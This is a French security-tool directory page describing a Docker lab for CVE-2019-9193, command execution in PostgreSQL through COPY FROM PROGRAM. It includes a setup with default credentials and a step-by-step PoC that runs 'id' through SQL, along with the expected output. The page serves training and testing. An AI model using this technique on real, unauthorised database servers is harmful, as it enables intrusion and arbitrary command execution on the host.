Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2019-9193byVulHub — Laboratoire basé sur Docker démontrant l'exécution arbitraire de commandes PostgreSQL via COPY FROM PROGRAM (CVE-2019-9193), avec un PoC étape par étape pour les tests de sécurité et la formation. | Kitploit
Outils/GitHubGitHub/corsisechero/cve-2019-9193byvulhub
Analyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationSécurité des Bases de DonnéesLabs et Pratique
GitHubcorsisechero/cve-2019-9193byvulhub

CVE-2019-9193byVulHub

Laboratoire basé sur Docker démontrant l'exécution arbitraire de commandes PostgreSQL via COPY FROM PROGRAM (CVE-2019-9193), avec un PoC étape par étape pour les tests de sécurité et la formation.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 1 anPas encore vérifié

CVE-2019-9193byVulHub


Exécution de commandes arbitraires PostgreSQL avec privilèges administrateur (CVE-2019-9193)

Description

PostgreSQL est un système de gestion de base de données relationnelle open-source puissant. Une vulnérabilité présente dans les versions 9.3 à 11 permet aux administrateurs ou aux utilisateurs disposant des privilèges COPY TO/FROM PROGRAM d'exécuter des commandes arbitraires sur le système.

Références :

  • GitHub - Vulhub - PostgreSQL CVE-2019-9193
  • Greenwolf Security - Authenticated Arbitrary Command Execution on PostgreSQL 9.3 - Latest

Configuration de l'environnement

Fichier Docker Compose (docker-compose.yml)

Créez un fichier docker-compose.yml avec le contenu suivant :

root@kitploit:~
version: '2'
services:
 postgres:
   image: vulhub/postgres:10.7
   ports:
    - "5432:5432"
   environment:
    - POSTGRES_PASSWORD=postgres

Démarrage du conteneur PostgreSQL

Exécutez le conteneur avec la commande suivante :

root@kitploit:~
docker compose up -d

Vérifiez que le conteneur est en cours d'exécution :

root@kitploit:~
docker ps

La sortie devrait montrer le conteneur PostgreSQL à l'écoute sur le port 5432.


Exécution de l'exploit sans entrer dans le conteneur

1. Installation du client PostgreSQL

Si vous n'avez pas le client psql installé, vous pouvez le faire avec :

  • Kali :
    root@kitploit:~
    apt-get install postgresql-client
    

2. Connexion à la base de données en ligne de commande

Connectez-vous directement à la base de données depuis Kali :

root@kitploit:~
psql -h localhost -p 5432 -U postgres

Le mot de passe vous sera demandé, saisissez :

root@kitploit:~
postgres

3. Exécution du PoC (Proof of Concept)

Une fois connecté à la console PostgreSQL, exécutez les commandes suivantes pour exploiter la vulnérabilité :

root@kitploit:~
-- Supprime la table si elle existe
DROP TABLE IF EXISTS cmd_exec;

-- Crée une nouvelle table pour stocker la sortie de la commande
CREATE TABLE cmd_exec(cmd_output text);

-- Exécute la commande 'id' via la fonction COPY FROM PROGRAM
COPY cmd_exec FROM PROGRAM 'id';

-- Affiche la sortie de la commande
SELECT * FROM cmd_exec;

4. Exécution de la commande en ligne de commande (sans shell interactif)

Vous pouvez tout exécuter directement depuis la ligne de commande :

root@kitploit:~
psql -h localhost -p 5432 -U postgres -c "DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'id'; SELECT * FROM cmd_exec;"

Vérification de la sortie

Si l'exploit a réussi, vous devriez voir une sortie similaire :

root@kitploit:~
       cmd_output
-------------------------
 uid=999(postgres) gid=999(postgres) groups=999(postgres)
(1 row)

Sortie de la console PostgreSQL

Appuyez sur \q pour quitter :

root@kitploit:~
\q

Notes de sécurité

Cette vulnérabilité permet l'exécution arbitraire de commandes avec des privilèges administrateur. Utilisez-la uniquement dans des environnements contrôlés et à des fins d'étude ou de vérification. Exploiter cette vulnérabilité sur des systèmes non autorisés est illégal.

Télécharger l’outil